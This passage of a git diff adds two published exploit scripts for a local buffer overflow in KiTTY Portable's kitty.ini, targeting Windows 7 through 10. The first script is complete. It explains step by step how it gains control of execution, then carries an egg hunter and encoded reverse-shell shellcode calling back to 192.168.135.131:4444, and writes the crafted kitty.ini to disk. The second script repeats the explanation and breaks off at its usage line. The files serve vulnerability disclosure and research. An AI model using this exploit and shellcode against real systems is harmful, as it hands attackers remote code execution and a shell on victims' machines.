another kitty.ini parameter +2015-11-15: KiTTY 0.66.6.1p released, seems fixed +2015-12-28: exploit published + +Description : +------------- +A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into +the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is +overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use +kitty_portable.exe addresses, which start with a NULL. Successful exploitation will grant an +attacker a reverse shell on Windows 7 Pro x64. + +Win7 -> Code Execution + +Instructions: +------------- +- Run exploit +- Launch KiTTY + +Exploitation: +------------- +As EDX register points to our buffer, it seems like using a return address pointing to a +JMP EDX instruction would do the trick. 
However this is not the case, because of the address containing +a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be +overwritten: + +EAX = 00000041 +00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX] +00533DA4 00 DB 00 + +Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash, +but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking +like a deadend, is in fact exploitable: + +ECX and EBX points to our buffer +EDX and EDI are overwritten by our buffer + +EDI = 41414141 +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI] + +Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI +at offset 1048. We can write a valid memory address into EDI, allowing the program to continue +its execution. One such address is the address ESP points to on the stack: 0x0028C4F8. 
+Let's take a closer look to the code executed: + + +764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here +764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX] +764F8DBF 03D0 ADD EDX,EAX +764F8DC1 83F0 FF XOR EAX,FFFFFFFF +764F8DC4 33C2 XOR EAX,EDX +764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX] +764F8DC8 83C1 04 ADD ECX,4 +764F8DCB A9 00010181 TEST EAX,81010100 +764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9 + +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE +764F8DD4 83C7 04 ADD EDI,4 +764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above + +1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address +2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF, +overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our +buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction +following this code: + +764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE +764F8DD4 83C7 04 ADD EDI,4 +764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 +764F8DD9 84D2 TEST DL,DL +764F8DDB 74 32 JE SHORT msvcrt.764F8E0F +764F8DDD 84F6 TEST DH,DH +764F8DDF 74 15 JE SHORT msvcrt.764F8DF6 +764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000 +764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF +764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX +764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8] +764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0 +764F8DF4 5F POP EDI +764F8DF5 C3 RETN <------- We want that ! + +This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction. +If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would +give us the control of the execution flow. 
+ +When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP +has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-) + +However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no +crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end +of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and +take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI. + +1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL +2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there +for EDI +3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try +to make ESP pointing to it when the crash happens. + +After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time +of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make +EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4. +As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'. 
+ +To sume it up: +1) First crash with EIP overwritten seems not exploitable +2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers +3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack +4) The RET instruction is reached and execution crashes again +5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct +offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow. + +That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building, +who do all the work for us inside, and goes out back to us with the vault key (EIP). + +Finally, as the memory area we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. +""" + +egg = "w00t" # \x77\x30\x30\x74 + +# Wow64 Egghunter - Corelan Team +# Written by Lincoln (lincoln@corelan.be) +# Size: 46 bytes +egghunter = ( +"\x31\xdb" # XOR EBX, EBX +"\x53" # PUSH EBX +"\x53" # PUSH EBX +"\x53" # PUSH EBX +"\x53" # PUSH EBX +"\xb3\xc0" # MOV BL,0xc0 +"\x66\x81\xCA\xFF\x0F" # OR DX,0FFF +"\x42" # INC EDX +"\x52" # PUSH EDX +"\x6A\x26" # PUSH 26 +"\x58" # POP EAX +"\x33\xC9" # XOR ECX,ECX +"\x8B\xD4" # MOV EDX,ESP +"\x64\xff\x13" # CALL DWORD PTR FS:[ebx] +"\x5e" # POP ESI +"\x5a" # POP EDX +"\x3C\x05" # CMP AL,5 +"\x74\xe9" # JE SHORT egg.0043F000 +"\xB8\x77\x30\x30\x74" # MOV EAX,74303077 w00t +"\x8B\xFA" # MOV EDI,EDX +"\xAF" # SCAS DWORD PTR ES:[EDI] +"\x75\xe4" # JNZ SHORT egg.0043F001 +"\xAF" # SCAS DWORD PTR ES:[EDI] +"\x75\xe1" # JNZ SHORT 0043F001 +"\xFF\xE7" # JMP EDI +) + +# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want) +# Encoder: x86/alpha_mixed +# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31 +# Size: 710 bytes 
+shellcode = (
+"\x89\xe3\xda\xd4\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x6b\x4c\x48\x68\x4c\x42\x45\x50\x57\x70\x67\x70\x33\x50\x4e"
+"\x69\x49\x75\x35\x61\x39\x50\x53\x54\x6c\x4b\x32\x70\x76\x50"
+"\x6c\x4b\x56\x32\x46\x6c\x4c\x4b\x73\x62\x46\x74\x4c\x4b\x72"
+"\x52\x54\x68\x64\x4f\x6f\x47\x33\x7a\x57\x56\x44\x71\x49\x6f"
+"\x6c\x6c\x55\x6c\x63\x51\x33\x4c\x77\x72\x56\x4c\x61\x30\x6a"
+"\x61\x4a\x6f\x76\x6d\x66\x61\x6f\x37\x6b\x52\x6a\x52\x56\x32"
+"\x73\x67\x4c\x4b\x62\x72\x46\x70\x6c\x4b\x33\x7a\x67\x4c\x4c"
+"\x4b\x30\x4c\x76\x71\x64\x38\x49\x73\x53\x78\x77\x71\x4b\x61"
+"\x53\x61\x4c\x4b\x30\x59\x51\x30\x35\x51\x4a\x73\x4c\x4b\x47"
+"\x39\x67\x68\x68\x63\x36\x5a\x33\x79\x6e\x6b\x44\x74\x6c\x4b"
+"\x36\x61\x6b\x66\x44\x71\x49\x6f\x4e\x4c\x49\x51\x38\x4f\x56"
+"\x6d\x66\x61\x6f\x37\x56\x58\x4b\x50\x51\x65\x59\x66\x54\x43"
+"\x43\x4d\x68\x78\x45\x6b\x63\x4d\x75\x74\x33\x45\x4a\x44\x30"
+"\x58\x6c\x4b\x71\x48\x35\x74\x47\x71\x5a\x73\x65\x36\x6c\x4b"
+"\x76\x6c\x42\x6b\x6e\x6b\x30\x58\x55\x4c\x36\x61\x79\x43\x6c"
+"\x4b\x55\x54\x6e\x6b\x37\x71\x7a\x70\x6b\x39\x70\x44\x71\x34"
+"\x65\x74\x43\x6b\x53\x6b\x73\x51\x73\x69\x42\x7a\x73\x61\x4b"
+"\x4f\x4d\x30\x73\x6f\x53\x6f\x32\x7a\x4c\x4b\x62\x32\x68\x6b"
+"\x6e\x6d\x63\x6d\x30\x68\x50\x33\x44\x72\x63\x30\x53\x30\x33"
+"\x58\x50\x77\x43\x43\x45\x62\x71\x4f\x30\x54\x43\x58\x72\x6c"
+"\x54\x37\x34\x66\x73\x37\x6b\x4f\x6e\x35\x4e\x58\x7a\x30\x76"
+"\x61\x37\x70\x65\x50\x64\x69\x6a\x64\x32\x74\x72\x70\x50\x68"
+"\x34\x69\x4d\x50\x62\x4b\x45\x50\x79\x6f\x68\x55\x46\x30\x56"
+"\x30\x66\x30\x62\x70\x73\x70\x72\x70\x63\x70\x72\x70\x42\x48"
+"\x38\x6a\x74\x4f\x6b\x6f\x6b\x50\x79\x6f\x69\x45\x6f\x67\x63"
+"\x5a\x65\x55\x50\x68\x79\x50\x6c\x68\x6d\x57\x4d\x53\x32\x48"
+"\x36\x62\x57\x70\x67\x61\x43\x6c\x6b\x39\x4b\x56\x71\x7a\x76"
+"\x70\x73\x66\x51\x47\x43\x58\x6f\x69\x59\x35\x54\x34\x43\x51"
+"\x79\x6f\x49\x45\x4e\x65\x4f\x30\x63\x44\x44\x4c\x79\x6f\x50"
+"\x4e\x56\x68\x53\x45\x7a\x4c\x73\x58\x6c\x30\x4e\x55\x4c\x62"
+"\x46\x36\x69\x6f\x38\x55\x55\x38\x53\x53\x42\x4d\x70\x64\x55"
+"\x50\x4e\x69\x68\x63\x33\x67\x72\x77\x76\x37\x36\x51\x4a\x56"
+"\x61\x7a\x54\x52\x46\x39\x53\x66\x4b\x52\x69\x6d\x71\x76\x49"
+"\x57\x30\x44\x46\x44\x77\x4c\x57\x71\x47\x71\x4e\x6d\x47\x34"
+"\x37\x54\x62\x30\x58\x46\x77\x70\x53\x74\x43\x64\x52\x70\x42"
+"\x76\x43\x66\x33\x66\x51\x56\x53\x66\x72\x6e\x66\x36\x46\x36"
+"\x52\x73\x72\x76\x30\x68\x52\x59\x48\x4c\x47\x4f\x4b\x36\x6b"
+"\x4f\x59\x45\x6f\x79\x4b\x50\x52\x6e\x51\x46\x57\x36\x39\x6f"
+"\x66\x50\x75\x38\x55\x58\x4d\x57\x45\x4d\x51\x70\x69\x6f\x4e"
+"\x35\x6f\x4b\x78\x70\x6c\x75\x6d\x72\x42\x76\x32\x48\x4d\x76"
+"\x7a\x35\x4d\x6d\x6d\x4d\x79\x6f\x68\x55\x57\x4c\x65\x56\x71"
+"\x6c\x74\x4a\x6d\x50\x69\x6b\x4b\x50\x70\x75\x55\x55\x4f\x4b"
+"\x72\x67\x34\x53\x73\x42\x72\x4f\x73\x5a\x63\x30\x52\x73\x4b"
+"\x4f\x39\x45\x41\x41"
+)
+
+# Stack address where to copy our shellcode, with an offset of ESP - 1052
+edi = '\xE4\xC0\x28' # 0x0028C0E4 WIN7 Pro x64
+
+nops = '\x90' * 8
+eggmark = egg * 2
+padding = '\x41' * (1048 - len(nops) - len(egghunter))
+
+# The memory area we land makes bigger shellcode crashes after being decoded
+# Using a 46 bytes egg hunter and putting our shellcode somewhere else solves this problem
+payload1 = nops + egghunter + padding + edi # Egg Hunter
+payload2 = eggmark + nops + shellcode # Final Shellcode
+
+# Kitty.ini configuration file
+buffer ="[ConfigBox]\n"
+buffer +="height=22\n"
+buffer +="filter=yes\n"
+buffer +="#default=yes\n"
+buffer +="#noexit=no\n"
+buffer +="[KiTTY]\n"
+buffer +="backgroundimage=no\n"
+buffer +="capslock=no\n"
+buffer +="conf=yes\n"
+buffer +="cygterm=yes\n"
+buffer +="icon=no\n"
+buffer +="#iconfile=\n"
+buffer +="#numberoficons=45\n"
+buffer +="paste=no\n"
+buffer +="print=yes\n"
+buffer +="scriptfilefilter=\n"
+buffer +="size=no\n"
+buffer +="shortcuts=yes\n"
+buffer +="mouseshortcuts=yes\n"
+buffer +="hyperlink=no\n"
+buffer +="transparency=no\n"
+buffer +="#configdir=\n"
+buffer +="#downloaddir=\n"
+buffer +="#uploaddir=\n"
+buffer +="remotedir=\n"
+buffer +="#PSCPPath=\n"
+buffer +="#PlinkPath=\n"
+buffer +="#WinSCPPath=\n"
+buffer +="#CtHelperPath=\n"
+buffer +="#antiidle== \k08\\\n"
+buffer +="#antiidledelay=60\n"
+buffer +="sshversion=" + payload2 + "\n" # Shellcode
+buffer +="#WinSCPProtocol=sftp\n"
+buffer +="#autostoresshkey=no\n"
+buffer +="#UserPassSSHNoSave=no\n"
+buffer +="KiClassName=" + payload1 + "\n" # Egg Hunter
+buffer +="#ReconnectDelay=5\n"
+buffer +="savemode=dir\n"
+buffer +="bcdelay=0\n"
+buffer +="commanddelay=5\n"
+buffer +="initdelay=2.0\n"
+buffer +="internaldelay=10\n"
+buffer +="slidedelay=0\n"
+buffer +="wintitle=yes\n"
+buffer +="zmodem=yes\n"
+buffer +="[Print]\n"
+buffer +="height=100\n"
+buffer +="maxline=60\n"
+buffer +="maxchar=85\n"
+buffer +="[Folder]\n"
+buffer +="[Launcher]\n"
+buffer +="reload=yes\n"
+buffer +="[Shortcuts]\n"
+buffer +="print={SHIFT}{F7}\n"
+buffer +="printall={F7}\n"
+
+# Location of our Kitty.ini file (modify with your KiTTY directory)
+file = "C:\\kitty\\App\\KiTTY\\kitty.ini"
+try:
+ print "[*] Writing to %s (%s bytes)" % (file, len(buffer))
+ f = open(file,'w')
+ f.write(buffer)
+ f.close()
+ print "[*] Done!"
+except:
+ print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39122.py b/platforms/windows/local/39122.py
new file mode 100755
index 000000000..bc167fb16
--- /dev/null
+++ b/platforms/windows/local/39122.py
@@ -0,0 +1,263 @@
+# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
+# Date: 28/12/2015
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: http://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.9bis.net/kitty/
+# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
+# Version: 0.65.0.2p
+# Tested on: Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
+# Category: Local
+
+"""
+Disclosure Timeline:
+--------------------
+2015-09-18: Vulnerability discovered
+2015-09-26: Vendor contacted
+2015-09-28: Vendor answer
+2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
+2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter
+2015-11-15: KiTTY 0.66.6.1p released, seems fixed
+2015-12-28: exploit published
+
+Description :
+-------------
+A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into
+the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is
+overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use
+kitty_portable.exe addresses, which start with a NULL. Successful exploitation will allow to execute
+local executables on Windows 8.1 and Windows 10.
+
+Win8.1 -> Code Execution
+Win10 -> Code Execution
+
+Instructions:
+-------------
+- Run exploit
+- Launch KiTTY
+
+Exploitation:
+-------------
+As EDX register points to our buffer, it seems like using a return address pointing to a
+JMP EDX instruction would do the trick. However this is not the case, because of the address containing
+a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be
+overwritten:
+
+EAX = 00000041
+00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX]
+00533DA4 00 DB 00
+
+Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash,
+but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking
+like a deadend, is in fact exploitable:
+
+ECX and EBX points to our buffer
+EDX and EDI are overwritten by our buffer
+
+EDI = 41414141
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI]
+
+Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI
+at offset 1048. We can write a valid memory address into EDI, allowing the program to continue
+its execution. One such address is the address ESP points to on the stack: 0x0028C4F8.
+Let's take a closer look to the code executed:
+
+
+764F8DB8 BA FFFEFE7E MOV EDX,7EFEFEFF <-------- (3) JMP back here
+764F8DBD 8B01 MOV EAX,DWORD PTR DS:[ECX]
+764F8DBF 03D0 ADD EDX,EAX
+764F8DC1 83F0 FF XOR EAX,FFFFFFFF
+764F8DC4 33C2 XOR EAX,EDX
+764F8DC6 8B11 MOV EDX,DWORD PTR DS:[ECX]
+764F8DC8 83C1 04 ADD ECX,4
+764F8DCB A9 00010181 TEST EAX,81010100
+764F8DD0 75 07 JNZ SHORT msvcrt.764F8DD9
+
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- (1) We start HERE
+764F8DD4 83C7 04 ADD EDI,4
+764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8 <------- (2) jump back above
+
+1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address
+2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF,
+overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our
+buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction
+following this code:
+
+764F8DD2 8917 MOV DWORD PTR DS:[EDI],EDX <------- We are HERE
+764F8DD4 83C7 04 ADD EDI,4
+764F8DD7 EB DF JMP SHORT msvcrt.764F8DB8
+764F8DD9 84D2 TEST DL,DL
+764F8DDB 74 32 JE SHORT msvcrt.764F8E0F
+764F8DDD 84F6 TEST DH,DH
+764F8DDF 74 15 JE SHORT msvcrt.764F8DF6
+764F8DE1 F7C2 0000FF00 TEST EDX,0FF0000
+764F8DE7 75 16 JNZ SHORT msvcrt.764F8DFF
+764F8DE9 66:8917 MOV WORD PTR DS:[EDI],DX
+764F8DEC 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
+764F8DF0 C647 02 00 MOV BYTE PTR DS:[EDI+2],0
+764F8DF4 5F POP EDI
+764F8DF5 C3 RETN <------- We want that!
+
+This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction.
+If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would
+give us the control of the execution flow.
+
+When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP
+has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-)
+
+However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no
+crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end
+of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and
+take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI.
+
+1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL
+2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there
+for EDI
+3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try
+to make ESP pointing to it when the crash happens.
+
+After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time
+of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make
+EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4.
+As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'.
+
+To sume it up:
+1) First crash with EIP overwritten seems not exploitable
+2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers
+3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack
+4) The RET instruction is reached and execution crashes again
+5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct
+offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow.
+
+That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building,
+who do all the work for us inside, and goes out back to us with the vault key (EIP).
+"""
+
+import sys
+
+if len(sys.argv) == 1:
+ print "\nUsage: kitty_ini_8_10.py